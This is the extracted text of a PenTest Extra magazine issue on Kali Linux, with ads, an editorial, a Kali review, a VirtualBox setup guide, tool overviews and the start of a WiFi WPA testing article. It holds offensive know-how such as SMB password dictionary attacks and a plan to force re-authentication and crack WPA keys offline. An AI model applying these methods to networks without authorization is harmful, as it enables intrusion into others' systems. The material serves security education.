PenTest - Kali Linux 2 PDF

Cyber Security Auditing Software
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can

examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com
With Nipper Studio penetration testers can be experts in You can customize the audit policy for your customers
every device that the software supports, giving them the specific requirements (e.g. password policy), audit the
ability to identify device, version and configuration device to that policy and then create the report detailing
specific issues without having to manually reference the issues identified. The reports can include device
multiple sources of information. With support for around specific mitigation actions and be customized with your
100 firewalls, routers, switches and other infrastructure own companies styling. Each report can then be saved
devices, you can speed up the audit process without in a variety of formats for management of the issues.
compromising the detail. Why not see for yourself, evaluate for
free at titania.com
Ian has been working with leading global

organizations and government agencies to
help improve computer security for more
than a decade.
He has been accredited by CESG for his security and
team leading expertise for over 5 years. In 2009 Ian
Whiting founded Titania with the aim of producing
security auditing software products that can be used by
non-security specialists and provide the detailed
analysis that traditionally only an experienced
penetration tester could achieve. Today Titanias
products are used in over 40 countries by government
and military agencies, financial institutions,
telecommunications companies, national infrastructure
organizations and auditing companies, to help them
secure critical systems.
www.titania.com
Dear PenTest Readers!
W ith great pleasure, we present you this issue of

PenTest Extra. Kali Linux 2 is the long expected
continuation of our fabulous adventure with this Offen-
sive Securitys distribution.
Editor in Chief:
The OS is a must-have of any pentester and ethi- Ewa Duranc
ewa.duranc@pentestmag.com
cal hacker, therefore, in the issue, you will find both ad-
vanced scenarios and some introductory descriptions Managing Editor:
Milena Bobrowska
covering the most of Kali capacities. milena.bobrowska@pentestmag.com
Editorial Advisory Board:

And so, Pranshu Bajpai opens the issue giving you Jeff Weaver, Rebecca Wynn
an In-Depth Review of the Kali Linux: A Hackers Bliss.
Betatesters & Proofreaders: Rodrigo Comegno,
Afterwards, in the Scenrios section you will have David Jardin, Varun Nair, Greg Rossel, John
Webb, Laszlo Acs, Abhiraj, Gilles Lami, Jos Luis
An Insight on Kali Linux by Sonu Tiwary. With Steve Herrera, Ivan Gutierrez Agramont, Phil Patrick,
Poulsen, you will get through Kali Linux Wi-Fi Testing. Dallas Moore, Marouan Bellioum John Webb,
Alexander Groisman, Mbella Ekoume, Arnoud
The next topic, covered by Fatty Lamin is Web Applica- Tijssen, Abhishek Koserwal
tions with Kali Linux. The section will be closed by Kev-
in Pescatello with his vision of Penetration Testing with Special Thanks to the Beta testers and
Linux and by Ignacio Sorribas Bypassing new genera- Proofreaders who helped us with this issue.
Without their assistance there would not be a
tion Firewalls with Meterpreter and SSH Tunnels. PenTest magazine.
Senior Consultant/Publisher: Pawel Marciniak

Next, you will explore The top 10 Kali Linux Secu-
rity Tools with Wolf Halton. And, at the end, in the Ex- CEO: Ewa Dudzic
ewa.dudzic@pentestmag.com
tra section you will read Analysis of Security and Pen-
etration Tests for Wireless Networks with Kali Linux by Production Director: Andrzej Kuca
andrzej.kuca@pentestmag.com
Demstenes Zegarra Rodrguez, who will also share
with you some of his personal thoughts on the toolbox in DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
the interview performed by Milena Bobrowska. Finally, ireneusz.pogroszewski@pentestmag.com
the issue will be closed by Jeff Weekes and Carlos Vil- Publisher: Hakin9 Media Sp. z o.o. SK
lalba Mapping Kali Usage to NIST800-115 for you and 02-676 Warszawa, ul. Postpu 17D
Phone: 1 917 338 3631
by an interview with Jeff Weekes by Milena Bobrowska. www.pentestmag.com
And this is it! Enjoy your reading, enjoy your PenTest! Whilst every effort has been made to ensure the
high quality of the magazine, the editors make
Milena Bobrowska and PenTest Team no warranty, express or implied, concerning the
results of content usage.
All trade marks presented in the magazine were
used only for informative purposes.
All rights to trade marks presented in the

magazine are reserved by the companies which
own them.
DISCLAIMER!
The techniques described in our
articles may only be used in private,
local networks. The editors hold
no responsibility for misuse of the
presented techniques or consequent
data loss.
EXTRA 05/2013(16) Page 4 http://pentestmag.com

CONTENTS
KALI LINUX INTRODUCTION during the pentest. This article may not cover all features of
Armitage. However, in order to provide you a better under-
06In-Depth Review of the Kali Linux:

A Hackers Bliss
By Pranshu Bajpai
standing of Amritage, Kali will be used as well in different
screenshots.
Kali Linux is a blessing for Penetration Testers worldwide.

It addresses many of the shortcomings of its predecessor
Backtrack and is immensly popular with professional Hack-
44Bypassing new generation Firewalls
with Meterpreter and SSH Tunnels
By Ignacio Sorribas
ers. Here we discuss the (relatively) new Kali Linux in depth In this article we seen how in some cases the firewall detects
and explore the qualities that make it different from Backtrack. malicious code and is capable of blocking the connections,
but also demonstrated how easy it is to bypass this restriction.
SCENARIOS
TOOLS
10 Kali Linux - the BackTrack
Successor
By Sonu Tiwary 52The Top 10 Kali Linux Security Tools
By Wolf Halton
On March 13, Kali, a complete rebuild of BackTrack Linux, This article is not the place to detail the features of all these
has been released. It has been constructed on Debian and is tools, but perhaps the tools that the developers consider to be
FHS (Filesystem Hierarchy Standard) complaint. It is an ad- the top 10 could be covered to some benefit to people consid-
vanced Penetration Testing and Security Auditing Linux dis- ering putting Kali into their network security toolbox.
tribution. It adhers completely to Debian development stan-
dards. However, one should not treat Kali Linux exactly the EXTRA
same as Debian...
16 Kali Linux Wi-Fi Testing

By Steve Poulsen
66

Analysis of Security and Penetration
Tests for Wireless Networks with
Kali Linux + Interview with the
In this article, we will explore penetration testing of a wireless Author
802.11 (WiFi) network using Kali Linux. We ail limit our test- By Demstenes Zegarra Rodrguez
ing to WAP which is of more interest to professionally secured The focus of this study is to perform penetration tests through
WiFi networks. It is also beneficial for us to focus on the com- a Linux distribution, Kali, which has a collection of security and
mand-line tools in order to provide better understanding of the forensics tools.
steps involved. This will help us gain a deeper understanding
which will help us to adapt our testing beyond standard reci-
pes. The following general steps will be followed in order to
better perform a WiFi security assessment and to afterward
70Mapping Kali Usage to NIST800-115
By Jeff Weekes and Carlos Villalba
Kali is an invaluable platform that when coupled with a
further lock-down our systems. sound methodology can make a penetration testers life
that much easier. In some cases Kali provides so many
26Web Applications with Kali Linux

By Fatty Lamin
Many penetration testers and serious hackers use Linux-
tools that novice penetration testers may struggle with how
all the tools fit together and how they can be used to truly
meet a client or internal customers penetration test objec-
based open source penetration test tools from which to launch tives. In this article we will try to shed some light on how
their attacks. Kali Linux contains a number of tools that can Kali can be used with a penetration testing methodology
be used by security professionals during a security assess- to streamline the penetration testing process and create a
ment process and vulnerability assessment. In this article, we stronger deliverable for the client.
will begin with a brief overview of Kalis features then focus
on how to perform web application testing using the tools in-
stalled in Kali Linux. 80Interview with Jeff Weekes
By PenTest Team
36Penetration testing with Linux

By Kevin Pescatello
Penetration testing with Linux is one of the best ways to per-
form tests. It is a versatile tool. This article will cover using
Backtrack5 RC3 and Armitage for the test as it was executed

KALI LINUX INTRODUCTION
In Depth Review of the

Kali Linux: A Hackers Bliss
Kali Linux is a blessing for Penetration Testers worldwide. It
addresses many of the shortcomings of its predecessor Backtrack
and is immensly popular with professional Hackers. Here we
discuss the (relatively) new Kali Linux in depth and explore the
qualities that make it different from Backtrack.
K
ali Linux is a Linux penetration testing and se- A Little History
curity auditing Linux distribution. After its re- To be very concise, Kali is an offshoot of Back-
lease in March 2013, Kali Linux has quickly track, which is an Offshoot of Whax, which is
become the new favorite among PenTesters world- itself an Offshoot of Whoppix, which is derived
wide as their choice for the PenTesting OS. Replacing from Knoppix. Something common among all of
its predecessor Backtrack, Kali incorporated several these distros is that they were focused on Digital
new features and looks quite promising. It is available Forensics and Intrusion Detection, with Backtrack
for i386 and amd64 architectures and has the same and Kali adding a whole lot of Tools for PenTest-
Minimum Hardware Requirements as Backtrack: 1 ing purposes. Backtrack has been giving ma-
GHz CPU, 8 GB of Hard Disk Space, 300 MB RAM, chine guns to monkeys since 2007, so it has had
And DVD-writer/Ability to boot with a Pen drive. a long reign as the favorite distro of PenTesters
worldwide. Offensive-Security, the creators of
Backtrack, decided to incorporate many changes
in new Backtrack 6 (as it was called at that time).
Since it was built from scratch, it was significantly
different from the older versions of Backtrack and
Offensive-Security decided to give a new name to
the Distro Kali Linux.
What was wrong with Backtrack and why

it needed a change?
We all love Backtrack but bottom-line is that there
are a lot of problems associated with this distro.
The most annoying problem is updating. There
was always a fear of breaking something if you
updated it. There were too many tools and some of
them werent updated as frequently as the others.
Figure 1. Kali Linux Main Menu So updating the dependencies of some would

cause others to crash and we struggled to main- ARM Devices Support
tain a balance where all these tools and their de- Kali is available for the following ARM devices:
pendencies would co-exist without getting in each rk3306 mk/ss808, Raspberry Pi, ODROID U2/
others way. X2, Samsung Chromebook, EfikaMX, Beaglebone
When we wanted to use a tool, we needed to Black, CuBox and Galaxy Note 10.1
type the absolute path in shell.
For example: /pentest/passwords/john/john Easier Updating and Upgrading
file_name. Packages on Kali can be updated with ease with-
Remembering the locations of the tools was a out worrying about breaking something. This is
pain and it just made things complicated. because the packages in the Kali repositories are
In addition, Backtrack had a lot of puny errors Debian Compliant. The Kali Distribution itself can
which crept up here and there while we were work- be upgraded to newer version without the need for
ing, small issues that we had to resolve on our own re-installing the distro.
or run to Backtrack forums and get help from other
Pentesters there. 300+ PenTesting Tools
For example, the wicd d-bus error that was This is quite a large collection and chances are
ready to greet us when we installed a fresh copy of that we wont be needing all of them and we
BT5 and tried to connect to a network. Backtrack might be needing some that are not included
forums (and other websites) are filled with how- by default. However packages can always be
to posts that attempt to provide solution to such grabbed from the repositories at will, so thats
problems. Eventually we learned to get around never a problem.
these issues but it did waste a lot of our time.
What is this Forensics Mode?
What makes Kali different While booting up Kali Linux, an option exists for
from Backtrack 5? Live Forensic Mode (Figure 2). This is quite a
This is the most asked question about Kali today. useful feature if we want to do some real world fo-
Offensive Security has tried to answer it on their rensic work. When into Forensics Mode, the inter-
website Unfortunately for us, thats not a sim- nal Hard Disk is not touched in any manner. The
ple question to answer. Its a mix between ev- People at Offensive Security Performed a Hash
erything and not much, depending on how you Comparison test where Hashes were taken of the
used Backtrack. Hard Drive before and after using Kali in forensics
mode. At the end of the test, the hashes matched
Highlights of the new Kali suggesting that no changes were made during
Switch From Ubuntu to Debian the operation. Also worth noticing is that the Au-
Kali Linux is based on Debian (Debian Wheezy). to mount of Removable Media is disabled while in
This turned out to be a great move by Offensive- Forensics mode.
Security. The New Kali is much more comfortable
to use than its predecessor.
File Hierarchy Standard Compliance

In the words of MUTS from Offensive Security,
What this means is that instead of having to navi-
gate through the /pentest tree, you will be able to
call any tool from anywhere on the system as ev-
ery application is included in the system path. This
is again a very welcome change in Kali.
Customizations of Kali ISOs

If need be, we can now build our own custom-
izations of Kali Linux. These ISOs can be boot-
strapped directly from the repositories maintained
by Offensive Security. Figure 2. Kali Linux Boot Menu

KALI LINUX INTRODUCTION
Metasploit Framework in Kali The Top 10 tools in Kali Linux are mentioned below:
The discussion on Kali (or Backtrack for that mat-
ter) would be incomplete without a mention of Aircrack-ng For wireless Cracking
how well the Metasploit Framework is integrated Burpsuite For Web Applications Pentesting
with this distro. While msfconsole brings it up, Hydra For online Brute-Forcing of Passwords
msfupdate can update the metaspoit framework. John For offline Password Cracking
Like in Backtrack, POSTGRESQL is used to store Maltego For Intelligence Gathering
the database. Metasploit Framework For Exploitation
Nmap For Network Scanning
Owasp-zap - For finding vulnerabilities in web
applications
Sqlmap For exploiting SQL injection Vulnera-
bilities
Wireshark Network Protocol Analyzer
Kali Community Support

Figure 3. Metasploit Framework in Kali Kali Linux has an official IRC Channel on the
Freenode network, #kali-linux. It provides a
The guys from offensive security and rapid7 (peo- good platform to interact with other users of Kali
ple behind the metasploit project), co-operated to and get support. Kali Linux provides three official
pre-load Kali Linux with msfpro (the profession- repositories:
al web-service version of metasploit framework).
Metasploit in Kali has full tech support from rapid7. http.kali.org: main package repository
security.kali.org: security packages
Tools in Kali Linux cdimage.kali.org: ISO images
Tools are mostly the same as those found in Back-
track. However, in the Kali Linux menu, 10 Security Subtle differences noticed while regular
tools have been highlighted as the Top 10 (Figure work on Kali
4). Anyone who has worked on BT would have no One had to bring up the Graphical Interface manu-
trouble guessing which tools would be available on ally by typind startx in Backtrack. However Kali
Kali and which need to be grabbed from the repos- loads up the Graphical User Interface by default.
itories. More than 300 tools come packaged with Kali Linux environment is much cleaner and sta-
Kali which are enough to serve the needs of most ble than Backtrack 5.
PenTests. The Nessus Vulnerability scanner is not in-
stalled in Kali by default (as it was in Backtrack
5). You would have to install it manually from the
debian package.
Kali comes with a Graphical Packages installer
which can be used to install new packages with the
click of the mouse. It can brought up by typing the
command: gpk-application.
Figure 5. Graphical Package Installer in Kali

Figure 4. The Top 10 Security Tools in Kali

developers are working on it constantly to make it
On the Web better. It addresses the problems Backtrack 5 had
www.kali.org The main Kali Linux website and it is significantly different from its predeces-
docs.kali.org documentation site
forums.kali.org Discussion Forums
sor, yet any PenTester who was comfortable using
bugs.kali.org For reporting bugs Backtrack 5 would find his way around in Kali Linux
git.kali.org monitor the development of Kali Linux with ease. The default login in Kali Linux is in root
mode, so it is not the everyday desktop OS and is
not recommended for those new to Linux. Howev-
In Backtrack, several PenTesters faced issues in er it fits the Penetration Testing needs perfectly.
getting their Bluetooth up and running. The Backtrack
forums are filled with people troubleshooting their Pranshu Bajpai
Bluetooth devices. In Kali Linux no such problem was Pranshu Bajpai (MBA, MS) is a Comput-
noticed and the Bluetooth works fine. Firefox is re- er Security Professional specialized in Sys-
placed by Iceweasal which doesnt matter much as tems, Network and Web Penetration Test-
they are both similar. However the Iceweasal Browser ing. He is completing his Masters in In-
in Kali doesnt come pre-loaded with plug-ins like no- formation Security from the Indian Insti-
script as in Firefox in Backtrack. Iceweasal comes tute of Information Technology. Currently
clean. Small issues like inability to control your back- he is also working as a Freelance Penetra-
light in Backtrack have been fixed in Kali Linux. So tion Tester on a Counter-Hacking Project
you would have a smoother working environment. with a Security Firm in Delhi, India, where
his responsibilities include Vulnerability Research, Exploit kit
Summary deployment, Maintaining Access and Reporting. He is an
Kali Linux definitely turned out to be everything that active speaker with a passion for Information security. In his
a Penetration Tester would want from a Linux distro. free time he enjoys listening to Classic Rock while blogging
It does have room for improvements though and the on www.lifeofpentester.blogspot.com.
a d v e r t i s e m e n t
Reduce Time, Reduce Cost, Reduce Risk
EMBEDDED LINUX
Design, Development, and Manufacturing
Embedded Software Design Services

Our embedded design expertise, coupled with our systems design skills, allows us to deliver products that
are leading edge as well as solid and robust. Embedded DSP/uC designs including embedded Linux, TI
DaVinciTM DVSDK, as well as PC based Linux systems are within our portfolio.
For more information, contact us at

sales@css-design.com
402-261-8688
www.css-design.com
Communication Systems Solutions 6030 S. 58th St. STE C Lincoln, NE 68516 402.261.8688
SCENARIOS
Kali Linux
The BackTrack Successor
On March 13, Kali, a complete rebuild of BackTrack Linux, has
been released. It has been constructed on Debian and is FHS
(Filesystem Hierarchy Standard) complaint. It is an advanced
Penetration Testing and Security Auditing Linux distribution. It
adhers completely to Debian development standards. However,
one should not treat Kali Linux exactly the same as Debian.
B
ackTrack is an open-source Linux-based was built on Ubuntu, Kali Linux is built from scratch
penetration testing toolset. In Backtrack, and constructed on Debian and is FHS (Filesystem
the common tools that you needed to per- Hierarchy Standard) compliant. Improved software
form a security assessment were all packaged in- repositories synchronized with the Debian reposito-
to one nice distribution and ready to go at a mo- ries makes it easier to keep it updated, apply patch-
ments notice. BackTrack made it easy to create es and add new tools. Kali Linux can also be eas-
a new VM (Virtual Machine) from the downloaded ily customized so that it contains only the packages
ISO (International Organization for Standardiza- and features that are required. Desktop environment
tion), perform the assessment, then either archive can also be customized to use GNOME(default),
that VM (Virtual Machine) for future reference or KDE (K Desktop Environment), LXDE (Lightweight
delete it when done to remove the evidence. X11 Desktop Environment), or whatever you prefer.
Some Other Differences
In Kali, there is no /pentest directory like in

Backtrack 5. Fire up any tool just by typing its
name in the shell.
They have removed Nessus Vulnerability
Scanner in Kali, it can be manually installed by
downloading it from Tenable.
Errors like Error connecting to wicds D-bus
bla bla when you try to fire up Wicd in Back-
track 5 are gone. Kali Linux is much more
cleaner in these respect than Backtrack 5.
Figure 1. Kali Linux Kali Linux is Smaller in size than Backtrack 5
(which was around 3 GB approx). Kali Linux
Kali Linux ISO is just 2 GB (approx) in size.
Kali Linux is a new open source distribution that fa- Firefox has been replaced by Iceweasal. They
cilitates penetration testing. Whereas BackTrack are both given by Mozilla and very similar.

However like Firefox in Backtrack comes with Installing Kali Linux as a Virtual Machine
noscript and such add-ons for security, Ice- in Virtual Box
weasal in Kali comes clean. Kali Linux can be run as Live CD or it can be in-
Separate listing of much-hyped security tools stalled as a virtual machine in VirtualBox. You can
in the Menu of Kali Linux under Top 10 Securi- follow below mentioned steps to install Kali Linux
ty Tools. as a virtual machine in VirtualBox:
VLC Player comes pre-installed with Kali linux.
In Backtrack 5, you had to manually install it Creating a proper Virtual Machine for
and then it gave you an error saying Wont run Kali Linux.
in root mode and then you had to hex-edit the Installing Kali Linux to a hard disk inside the
VLC binary. Virtual Machine.
Light pdf viewer in Backtrack has been re- Install VirtualBox Guest Addition Tools in
placed by Document Viewer. Kali Linux.
No gedit in Kali, instead you can use Leafpad. Setting up shared folders in VirtualBox with
your Kali Linux installation.
Who Should Use Kali Linux
So, the question arises: Should I use Kali Linux? Note
Kali Linux aims towards professional penetra- The instructions below were performed with the
tion testing and security auditing. To reflect these VirtualBox version 4.2.8. If you are experiencing
needs, several core changes have been imple- issues with 4.1.x, please upgrade VirtualBox to this
mented in Kali Linux: or a later release.
Single user, root access by design: Since it Creating the Virtual Machine
has been designed for security auditing, Kali
Linux is designed to be used in a single, root Launch VirtualBox and using Virtual Machine
user scenario. Manager create a new virtual machine by click-
Network services disabled by default: Major ing New in the upper left corner.
security threats comes from various network Provide a Name for the virtual machine, OS (Op-
services running on the system. Kali Linux erating System) Type and Version. Set the Type to
is equipped with sysvinit hooks which disable Linux and the Version to Debian. Please make
network services by default. These hooks al- sure to choose the proper version 32 or 64 bit op-
low us to install various services on Kali Linux, tions for your architecture. Once completed, click
while ensuring that our distribution remains se- the continue button to move on with the setup.
cure by default, no matter what packages are Configure the amount of memory to allocate to
installed. Additional services such as Bluetooth your new virtual machine. As a minimum allo-
are also blacklisted by default. cate 2048MB. Once completed, click the Con-
Custom Linux Kernel: Kali Linux uses an up- tinue button.
stream kernel, patched for wireless injection. Next step is to create virtual machine hard drive.
The default is to Create a virtual hard drive
Since Kali is a Linux distribution specifically now. Accept the default and click the Create
geared towards professional penetration test- button in the lower right portion of the window.
ing and security auditing and as such, it is not Pick your hard drive file type. The default is
a recommended distribution for those unfamiliar VDI (VirtualBox Disk Image), however you can
with Linux. Misuse of security tools within your create any other type. For example, creating
network, particularly without permission, may a VMDK (Virtual Machine Disk) will allow you
cause irreparable damage and result in signifi- to use this hard drive with VMWare as well as
cant consequences. VirtualBox. Once you have selected your file
type, click the Continue button.
NOTE The next step gives you two options: to allo-
If you are looking for a Linux distribution to learn cate the entire amount of disk space at once,
the basics of Linux and need a good starting point, OR dynamically allocate as hard drive space is
Kali Linux is not the ideal distribution for you. You needed. Once you have made your selection,
may want to begin with Ubuntu or Debian instead. click the Continue button.

SCENARIOS
Provide hard drive file location and size. For lo- Once you have booted into your Kali Linux vir-
cation, it will always install in the default direc- tual machine, open a terminal window and issue
tory and only needs to be changed if desired. the following command to install the Linux Kernel
Approximately 8GB of disk space is required headers.
for base install of Kali Linux. It is good practice
to provide roughly 4 times that amount in order apt-get update && apt-get install -y linux-
to ensure proper space as you add to and up- headers-$(uname -r)
date the installed system with tools and files.
Once you have provided the desired size, click Now attach the Guest Additions CD-ROM. This
the Create button. can be done by selecting Devices from the Vir-
tualBox Menu and selecting Install Guest Addi-
Now, the new virtual machine has been created. tions. It will mount the GuestAdditions ISO to the
However, still there are few additional configura- virtual CD Drive in your Kali Linux virtual machine.
tion settings that you need to make. When prompted to autorun the CD, click the Can-
With your newly created Kali Linux virtual machine cel button (Figure 2).
selected, click the General link in the right portion From a terminal window, copy the VboxLinuxAd-
of the Manager window. This will launch a window ditions.run file from the Guest Additions CD-ROM to
that allows for additional configuration settings. a path on your local system. Make sure it is execut-
At least two following changes that should be able and run the file to begin installation (Figure 3).
made during this step:
Select the System option and the Processor

tab to change the amount of processors. As a
default, the machine is granted only 1 VCPU
(Virtual CPU). Provide at least 2 processors.
Next, select the Storage option to attach your
Kali Linux ISO image. In the Storage Tree
window, select your CD-ROM controller. Then
within the Attributes pane click the CD-Rom
Icon and Choose a virtual CD/DVD disk file
from the pop up menu. This will open a win-
dow to browse the host system for your Kali
Linux ISO file. Once selected, click the Open
button and then click the OK button to save all
your changes you will be returned to the Virtu-
alBox Manager.
Figure 2. Cancel_Auto_Run
You can now click the Start Button to launch the
VM (Virtual Machine) and begin the Kali Linux in-
stallation process.
Kali Linux Installation to a hard disk inside

virtual machine
The tutorial for installing Kali Linux can be found
here. Once installation is complete, you will need
to install the VirtualBox Guest Addition tools.
Install VirtualBox Guest Addition Tools in Kali

Linux
In order to have proper mouse and screen integra-
tion as well as folder sharing with your host sys-
tem, you will need to install the VirtualBox Guest
additions. Figure 3. VBoxAdditions_Install

cp /media/cd-rom/VBoxLinuxAdditions.run /root/ puter and booted up off of Kali in forensic boot
chmod 755 /root/VBoxLinuxAdditions.run mode. After using Kali for a period of time, I
cd /root then shut the system down, removed the hard
./VboxLinuxAdditions.run drive, and took the hash again. These hashes
matched, indicating that at no point was any-
To complete the Guest Additions installation, re- thing changed on the drive at all.
boot the Kali Linux VM (Virtual Machine). Full
mouse and screen integration as well as the abil-
ity to share folders with the host system should
now be available.
Creating Shared Folders with the Host System

There are a few short steps that need to be com-
pleted in order to share folders on your host sys-
tem with your Kali Linux VM (Virtual Machine).
From the VirtualBox Manager, select your Ka-
li Linux VM (Virtual Machine) instance and click
on the Shared Folders link in the right window
pane. This will launch a pop up window for adding
shared folders. Within this window click the icon
to add a folder.
In the Folder Path text box, provide the path
to the folder you would like to share, or click the
drop-down arrow to browse your host system for Figure 4. Shared_Folder_Config
the path. Select the check boxes that allow for Au-
to-mount and Make Permanent and click the OK
button both times when prompted (Figure 4).
Under media directory, your shared folders will
now be available. A bookmark or link can also be
created for easier access to the directory.
Kali Linux Forensics Mode

Forensic Boot introduced in BackTrack Linux
that continued on through BackTrack 5 also ex-
ists in Kali Linux. The Forensics Boot option has
proven to be very popular due to the widespread
availability of our operating system. Many people
have Kali ISOs laying around and when a foren-
sic need comes up, it is quick and easy to put Kali
Linux to the job. Pre-loaded with the most popu- Figure 5. Kali_Forensic_Mode
lar open source forensic software, Kali is a handy
tool when you need to do some open source fo-
rensic work (Figure 5).
When booted into the forensic boot mode, there
are a few very important changes that are made.
The internal hard disk is not touched. This

means that if swap partition exists, it will not be
used and no internal disk will be auto mounted.
To verify this, I removed the hard drive from
a standard system. Attaching this to a com-
mercial forensic package I took a hash of the
drive. I then re-attached the drive to the com- Figure 6. Top_10_Security_Tools

SCENARIOS
The auto mount of any removable media has most of the security enthusiast (Figure 6).
been disabled. So thumb drives, CDs, and so There are some other exciting tools in Kali Linux:
on will not be auto-mounted when inserted. The
idea behind all of this is simple: Nothing should ACCCHECK.PL
happen to any media without direct user action. This tool is used for Active Online Attack. It is de-
You are responsible for doing anything as a user. signed as a password dictionary attack tool that
targets Windows authentication via the SMB pro-
If you are interested in using Kali for real world fo- tocol. It is in fact a wrapper script around the smb-
rensics of any type, validate all forensic tools to client binary, and as a result is dependent on it for
ensure that you know their expected behavior in its execution.
any circumstance that you may place them.
Requirements
Exciting Tools in Kali Linux Victim Machine: Windows XP or Windows 7 or
In Kali Linux, top 10 security tools have been put Windows 8
under a single menu which makes life easier for Attacker Machine: Kali Linux OS
Figure 7. acccheck_tool_cli Figure 10. detect_sniffer6_GUI_Access
Figure 8. acccheck_tool_GUI_Access Figure 11. dnsrevenum6_cli
Figure 9. detect_sniffer6_cli Figure 12. dnsrevenum6_GUI_Access

For accessing acccheck.pl tool, open terminal few interesting facts about Kali Linux in this arti-
and type acccheck.pl and hit enter. It will display cle, I assume that you will be able to explore other
description, usage and example of the tool as tools on your own.
shown in the Figure 7. OR, you can access this To conclude, once again I would like to emphasis
tool graphically also (Figure 8). that if you are really interested in professional pen-
etration testing and security auditing, Kali Linux
DETECT_SNIFFER6 should be your preferred choice because most of
This tool is used to test if systems on the local LAN the industry standard security tools are bundled to-
are sniffing. gether in this distribution.
For accessing detect_sniffer6 tool, open terminal There are other interesting information on Ka-
and type detect_sniffer6 and hit enter. It will dis- li Linux. For more information, documentation is
play description, usage and example of the tool as present at http://docs.kali.org.
shown in the Figure 9.
To access this tool graphically: Figure 10.
Sonu Tiwary
DNSREVENUM6 Sonu Tiwary has more than 6 years of ex-
This tool is used for reverse DNS information gath- perience in IT industry with core expertise
ering for IPV6. in Linux. He is currently working as an As-
For accessing dnsrevenum6 tool, open terminal sistant Technical Manager with Koenig
and type dnsrevenum6 and hit enter. It will dis- Solutions Ltd. He has vast experience on
play description, usage and example of the tool as open source technologies and has also
shown in the Figure 11. handled several projects which demand
To access this tool graphically: Figure 12. in-depth knowledge of Linux. He is an en-
There are various other tools which can be handy gineering graduate in Computer Science and holds Red Hat
as per your requirement. However, after explaining Certified Engineer (RHCE) certification.
Kali Linux
WiFi Testing
In this article, we will explore penetration testing of a wireless
802.11 (WiFi) network using Kali Linux. We ail limit our testing
to WAP which is of more interest to professionally secured WiFi
networks. It is also beneficial for us to focus on the
command-line tools in order to provide better understanding of
the steps involved.
T
his will help us gain a deeper understanding naturally protected. WiFi networks borrow from de-
which will help us to adapt our testing be- cades of research in the field of cryptography, but
yond standard recipes. The following gener- also borrow some of the problems inherent in se-
al steps will be followed in order to better perform a cure communication systems.
WiFi security assessment and to afterward further Cryptographic systems have often solved the se-
lock-down our systems. curity problem quite easily by using encrypted data
streams and the latest cryptographic technologies.
Verify our equipment and setup Encrypting a data stream with a secret key and de-
Monitor the WiFi networks to obtain information crypting it with the same key works out quite well
about our access point (AP) under test. and can provide a high level of protection, provided
Capture AP key exchanges while injecting that certain protocols are followed. However, there
packets to force re-authentication. is much difficulty introduced in the simple method
Performing off-line key-cracking techniques on of sharing the secret key.
the captured data. Sharing a secret key or private key has been the
Use the results to improve security at our AP. target of much research and development as well
Repeat steps 3-5 until satisfied with the security. as the focal point in various security attacks. Ideally,
if you could share a private key in a private manner,
As we go through these steps, we will utilize var- the highest level of security is obtained. This might
ious tools provided by the Kali Linux distribution. involve two people meeting in a secret place and
We also are able to script these tools together and handing one to another a secret key written on a
create our own utilities as needed to aid in our pen- piece of paper. The key is then programmed into an-
etration testing. We will also briefly explore WPS other system, the paper is properly destroyed, and
exploitation, but only enough to demonstrate that the secret key is to remain a secret and never be
WPS must be disabled for proper security. shared where prying eyes could observe. Although
this is quite secure, it is also highly impractical.
WiFi Security In lieu of the previous option, we are now intro-
One of the things we must understand before at- duced with the problem of key exchange. Crypto-
tempting to secure our WiFi network is how it is graphic systems often need a way to share a key,

without allowing the passerby to also obtain the key. WiFi Data Capture
Although, this is beyond the scope of this article, it In order to test our WiFi network, we need to be
is helpful for the reader to understand that there is a able to first capture a key exchange between the
key exchange that occurs and that it is also crypto- access point and a valid user. This will give us the
graphically protected so that the key is not available. target to compare with as we attempt to guess the
Instead, some artifact of the key is transmitted which password. The first step for us will be to capture
is a function of the secret key. If we could guess the data. We need to setup our system to ensure that
secret key and generate the same artifact, we could we have the ability to listen in on the WiFi commu-
be confident that we have the right key if the artifacts nication that is around us. Lets begin setting up
matched. This is the exercise that we will pursue. our system to capture WiFi data.
Open a terminal and become root.
Setup
This article will use Kali Linux 1.0.5-amd64: root@kali:~> sudo -i
root@kali:~# lsb_release -r We first need to confirm we have a valid WiFi

Release: Kali Linux 1.0 dongle (Listing 2). wlan0 is present, which is our
root@kali:~# uname -a wireless device that we will be using. Start by
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2- bringing it down to ensure our system is not going
0+kali8 x86_64 GNU/Linux to be trying to use it out from under us.
Kali Linux is installed to a virtual machine in or- root@kali:~ ifconfig wlan0 down
der to allow the main PC or notebook to still have
access to the network. A separate external WiFi Check that it is no longer present: Listing 3.
dongle is needed. If operating in a virtual ma-
chine, the USB dongle needs to be assigned to
the VM. The following WiFi dongle will be used:
root@kali:~# lsusb -v -s 001:010

Bus 001 Device 010: ID 07b8:3070 AboCom Systems
Inc 802.11n/b/g Mini Wireless LAN USB2.0
Adapter
This WiFi dongle is based on the Ralink 3070

chipset (Listing 1). Lastly, we will be running all
commands as root. Although this may present a
security issue, several of the utilities require root
access and thus it is simply easier to run as root
for all the commands (Figure 1). Figure 1. Setup
Listing 1. Ralink 3070 chipset
[13134.967038] usb 1-1: new high-speed USB device number 10 using ehci_hcd
[13135.124983] usb 1-1: New USB device found, idVendor=07b8, idProduct=3070
[13135.124986] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[13135.124987] usb 1-1: Product: 802.11 n WLAN
[13135.124988] usb 1-1: Manufacturer: Ralink
